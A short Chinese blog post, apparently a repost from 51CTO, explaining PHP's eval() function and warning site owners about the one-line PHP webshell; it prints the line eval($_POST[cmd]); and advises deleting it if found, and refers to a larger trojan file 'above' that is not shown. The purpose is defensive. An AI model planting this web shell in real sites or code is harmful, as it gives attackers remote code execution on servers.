本文共 350 字,大约阅读时间需要 1 分钟。
黑客用得最多的一句了,可以解析php。很多木马文件都是这样做的,
上面是一个php大马文件,
eval() 函数把字符串按照 PHP 代码来计算。
该字符串必须是合法的 PHP 代码,且必须以分号结尾。
如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
由于安全原因,不建议大家在开发中使用。
下面一句最简单的代码,风险超级高,我们有时会看到自己的网站有这么一句:
| 1 | eval ( $_POST [cmd]);#这个就是php中的一句话木马,如果发现,马上删除 |
本文转自ning1022 51CTO博客,原文链接:http://blog.51cto.com/ning1022/1615717,如需转载请自行联系原作者